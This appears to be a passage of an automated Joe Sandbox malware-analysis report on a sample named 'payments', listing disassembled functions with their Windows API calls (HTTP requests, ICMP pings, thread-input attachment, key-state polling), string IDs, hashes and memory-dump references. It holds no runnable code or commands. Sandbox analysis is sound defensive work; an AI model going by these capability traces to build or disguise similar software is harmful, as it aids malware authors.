                                                                                                                          • String ID: @U=u$U
                                                                                                                          • API String ID: 4009187628-4110099822
                                                                                                                          • Opcode ID: 71b33f4cd47b0c217d01a79b61bda590679ac0665731b3990a5e1f94743a9e69
                                                                                                                          • Instruction ID: b9c955b7ab280c9710a73bd293bd46f903271d4c817b771364c7c5805b40dcf4
                                                                                                                          • Opcode Fuzzy Hash: 71b33f4cd47b0c217d01a79b61bda590679ac0665731b3990a5e1f94743a9e69
                                                                                                                          • Instruction Fuzzy Hash: 9D71A234400309DFCF219FA4C885BEA7B76FF49324F18426AED59962A6CB318841DF71
                                                                                                                          Function 00CE8107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • WSAStartup.WSOCK32(00000101,?), ref: 00CE8168
                                                                                                                          • inet_addr.WSOCK32(?,?,?), ref: 00CE81AD
                                                                                                                          • gethostbyname.WSOCK32(?), ref: 00CE81B9
                                                                                                                          • IcmpCreateFile.IPHLPAPI ref: 00CE81C7
                                                                                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CE8237
                                                                                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CE824D
                                                                                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00CE82C2
                                                                                                                          • WSACleanup.WSOCK32 ref: 00CE82C8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                          • String ID: Ping
                                                                                                                          • API String ID: 1028309954-2246546115
                                                                                                                          • Opcode ID: 4eceefbab929ba43e97c63fcf32b7d874daed739ccb836ba2cff74208ed405fa
                                                                                                                          • Instruction ID: b93a481714efdd5fa7f33cd3c5e145f0118faaece1191d164738ec6b36d21cbf
                                                                                                                          • Opcode Fuzzy Hash: 4eceefbab929ba43e97c63fcf32b7d874daed739ccb836ba2cff74208ed405fa
                                                                                                                          • Instruction Fuzzy Hash: 1151B031604701AFDB10AF66CC49B6AB7E5AF49310F048829FA6ADB2E0DF34E905DB51
                                                                                                                          Function 00CFECD4 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
                                                                                                                            • Part of subcall function 00CAB63C: GetCursorPos.USER32(000000FF), ref: 00CAB64F
                                                                                                                            • Part of subcall function 00CAB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00CAB66C
                                                                                                                            • Part of subcall function 00CAB63C: GetAsyncKeyState.USER32(00000001), ref: 00CAB691
                                                                                                                            • Part of subcall function 00CAB63C: GetAsyncKeyState.USER32(00000002), ref: 00CAB69F
                                                                                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00CFED3C
                                                                                                                          • ImageList_EndDrag.COMCTL32 ref: 00CFED42
                                                                                                                          • ReleaseCapture.USER32 ref: 00CFED48
                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00CFEDF0
                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00CFEE03
                                                                                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00CFEEDC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID$@U=u
                                                                                                                          • API String ID: 1924731296-2104563098
                                                                                                                          • Opcode ID: 580728eaa67f1ae533d0d1a53ea71c4dba90177ae15f63b5628800b2da8d87c6
                                                                                                                          • Instruction ID: 97192ac2af0f8e5cb0bfabfc1af79b13107172cb7fca53284f7f954317421ab6
                                                                                                                          • Opcode Fuzzy Hash: 580728eaa67f1ae533d0d1a53ea71c4dba90177ae15f63b5628800b2da8d87c6
                                                                                                                          • Instruction Fuzzy Hash: 6951BA74204304AFD710EF24DC9AFAA77E5FB88715F00491DFA95972E2DB709A08DB62
                                                                                                                          Function 00CDE389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00CDE396
                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00CDE40C
                                                                                                                          • GetLastError.KERNEL32 ref: 00CDE416
                                                                                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00CDE483
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                          • API String ID: 4194297153-14809454
                                                                                                                          • Opcode ID: b0aa63108d54ea79d9333d27f8cbce4d651ec25dfe5fe664f1a3596beec306aa
                                                                                                                          • Instruction ID: e81ae057c4adea6697a19a6a8a5a6fc8d7b17330628f290826fbbc33b8ac0f53
                                                                                                                          • Opcode Fuzzy Hash: b0aa63108d54ea79d9333d27f8cbce4d651ec25dfe5fe664f1a3596beec306aa
                                                                                                                          • Instruction Fuzzy Hash: 24317435A00209AFDB01FFA8C989ABEB7B4EF44300F14801AE615EB391DB70DA42D751
                                                                                                                          Function 00CF8ECC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00CF8EE4
                                                                                                                          • GetDC.USER32(00000000), ref: 00CF8EEC
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CF8EF7
                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00CF8F03
                                                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00CF8F3F
                                                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CF8F50
                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CFBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00CF8F8A
                                                                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CF8FAA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3864802216-2594219639
                                                                                                                          • Opcode ID: 37b2b0540f0641392b681a3460a3b917688dc6766485564b8708b56b9121387e
                                                                                                                          • Instruction ID: a9bfd5096ca1c0da02ed56ec45b31547d5bdab98a94a8b6524054fe9c1126668
                                                                                                                          • Opcode Fuzzy Hash: 37b2b0540f0641392b681a3460a3b917688dc6766485564b8708b56b9121387e
                                                                                                                          • Instruction Fuzzy Hash: 10317F72200218BFEB108F50CC4AFEA3BAEEF49715F044065FE09DA291CB759842CB70
                                                                                                                          Function 00CEB2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00CEB2D5
                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00CEB302
                                                                                                                          • CoUninitialize.OLE32 ref: 00CEB30C
                                                                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00CEB40C
                                                                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00CEB539
                                                                                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00CEB56D
                                                                                                                          • CoGetObject.OLE32(?,00000000,00D1D91C,?), ref: 00CEB590
                                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 00CEB5A3
                                                                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CEB623
                                                                                                                          • VariantClear.OLEAUT32(00D1D91C), ref: 00CEB633
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2395222682-0
                                                                                                                          • Opcode ID: e8de1be0fcb6091536ecf7355106ce4383414fea208a2452373c073f3c7e1d9c
                                                                                                                          • Instruction ID: cfb5b49448a33318f285e0657b005fcc460f72f945935d4be942caab39879735
                                                                                                                          • Opcode Fuzzy Hash: e8de1be0fcb6091536ecf7355106ce4383414fea208a2452373c073f3c7e1d9c
                                                                                                                          • Instruction Fuzzy Hash: 28C103B1608341AFC700DF65C88596BB7E9BF88308F00495DF59ADB251DB71ED45CB52
                                                                                                                          Function 00CD67E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __swprintf.LIBCMT ref: 00CD67FD
                                                                                                                          • __swprintf.LIBCMT ref: 00CD680A
                                                                                                                            • Part of subcall function 00CB172B: __woutput_l.LIBCMT ref: 00CB1784
                                                                                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00CD6834
                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00CD6840
                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00CD684D
                                                                                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 00CD686D
                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00CD687F
                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00CD688E
                                                                                                                          • LockResource.KERNEL32(?), ref: 00CD689A
                                                                                                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00CD68F9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1433390588-0
                                                                                                                          • Opcode ID: 54412b6fbdbe04b64fb013deca1c45b4fefef642b2e04e48501d4218d49eb34d
                                                                                                                          • Instruction ID: 8ff27ad042aaf3451f7c0322f4a81b8056bded2da15c6334deaaaae0886de0f4
                                                                                                                          • Opcode Fuzzy Hash: 54412b6fbdbe04b64fb013deca1c45b4fefef642b2e04e48501d4218d49eb34d
                                                                                                                          • Instruction Fuzzy Hash: E931827190031AABDB109F61DD55AFB7BA9EF08341F008426FA11D6290EB34DA12EB74
                                                                                                                          Function 00CD4025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00CD4047
                                                                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00CD30A5,?,00000001), ref: 00CD405B
                                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00CD4062
                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CD30A5,?,00000001), ref: 00CD4071
                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD4083
                                                                                                                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00CD30A5,?,00000001), ref: 00CD409C
                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CD30A5,?,00000001), ref: 00CD40AE
                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00CD30A5,?,00000001), ref: 00CD40F3
                                                                                                                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00CD30A5,?,00000001), ref: 00CD4108
                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00CD30A5,?,00000001), ref: 00CD4113
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2156557900-0
                                                                                                                          • Opcode ID: 7113c426bf94beadf27a36e14b918c4e3c86b1d3b671fd1c348aab41a603aece
                                                                                                                          • Instruction ID: 1c6d32b3ffbd569120bff7cc187e042b5385dc60cc5af99e975cb36fdd7c826c
                                                                                                                          • Opcode Fuzzy Hash: 7113c426bf94beadf27a36e14b918c4e3c86b1d3b671fd1c348aab41a603aece
                                                                                                                          • Instruction Fuzzy Hash: 7E313C71500304BBDB15DB54DC8ABB977AAAB64392F108117FF15E6390DBB4AA818B70
                                                                                                                          Function 00D00133 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 245windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
                                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00D0016D
                                                                                                                          • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00D0038D
                                                                                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00D003AB
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00D003D6
                                                                                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00D003FF
                                                                                                                          • ShowWindow.USER32(00000003,00000000), ref: 00D00421
                                                                                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 00D00440
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3356174886-2594219639
                                                                                                                          • Opcode ID: b2b948c053680f19bcfdea2c496b79aa859fd997b4b83d13a1524ca3ff27636f
                                                                                                                          • Instruction ID: 211e9d4e1f38b1ece9378c242d50f2eca04d88a2e5e7ba03bfda28a8872b733b
                                                                                                                          • Opcode Fuzzy Hash: b2b948c053680f19bcfdea2c496b79aa859fd997b4b83d13a1524ca3ff27636f
                                                                                                                          • Instruction Fuzzy Hash: F0A19E35600616FFDB19CF68C9857BDBBB2BF08701F088115ED58A7290DB74AD51CBA0
                                                                                                                          Function 00CCCB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • EnumChildWindows.USER32(?,00CCCF50), ref: 00CCCE90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ChildEnumWindows
                                                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                          • API String ID: 3555792229-1603158881
                                                                                                                          • Opcode ID: 01033061a5262b801157f62f19cc3581b4dd735a4b56370024be468ef074c70c
                                                                                                                          • Instruction ID: c867afdf509962c7fb6d949fae39cbbb21f3928eeeedea536887a675b7504080
                                                                                                                          • Opcode Fuzzy Hash: 01033061a5262b801157f62f19cc3581b4dd735a4b56370024be468ef074c70c
                                                                                                                          • Instruction Fuzzy Hash: AB914E30600506ABCB18EFA0C4D1BEAFB65FF05314F54855DE85EA7291DF306A5AEBE0
                                                                                                                          Function 00C93093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C930DC
                                                                                                                          • CoUninitialize.OLE32(?,00000000), ref: 00C93181
                                                                                                                          • UnregisterHotKey.USER32(?), ref: 00C932A9
                                                                                                                          • DestroyWindow.USER32(?), ref: 00D05079
                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00D050F8
                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D05125
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                          • String ID: close all
                                                                                                                          • API String ID: 469580280-3243417748
                                                                                                                          • Opcode ID: 8d044a3cd4ef124e6d00caa56985f4afda7193ed768623fe5a54587afb664af9
                                                                                                                          • Instruction ID: 7c5cee13b369267ce493a59a08a865e8a8c41ac0a72dff134cab58e49559fc2f
                                                                                                                          • Opcode Fuzzy Hash: 8d044a3cd4ef124e6d00caa56985f4afda7193ed768623fe5a54587afb664af9
                                                                                                                          • Instruction Fuzzy Hash: 3D914C34600242DFCB19EF14D999B69F3B4FF04304F5582A9E90AA72A2DF30AE56DF54
                                                                                                                          Function 00CF9A75 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 142windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00CF9B19
                                                                                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00CF9B2D
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00CF9B47
                                                                                                                          • _wcscat.LIBCMT ref: 00CF9BA2
                                                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00CF9BB9
                                                                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00CF9BE7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window_wcscat
                                                                                                                          • String ID: @U=u$SysListView32
                                                                                                                          • API String ID: 307300125-1908207174
                                                                                                                          • Opcode ID: 38c09c9d560442ade902690dcfe192c18a9a45a13f651f4cd45de8324680a4d9
                                                                                                                          • Instruction ID: 9fb3311ee3756c39abb92caf8a2ffc87d3024705f955f7dcc4f63cc318f6f824
                                                                                                                          • Opcode Fuzzy Hash: 38c09c9d560442ade902690dcfe192c18a9a45a13f651f4cd45de8324680a4d9
                                                                                                                          • Instruction Fuzzy Hash: 5341AD70A0030CABDF219FA4DC85BEE77A9EF08350F10442AF659E7291D7719E85DB61
                                                                                                                          Function 00CE45C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CE45FF
                                                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00CE462B
                                                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00CE466D
                                                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00CE4682
                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CE468F
                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00CE46BF
                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00CE4706
                                                                                                                            • Part of subcall function 00CE5052: GetLastError.KERNEL32(?,?,00CE43CC,00000000,00000000,00000001), ref: 00CE5067
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
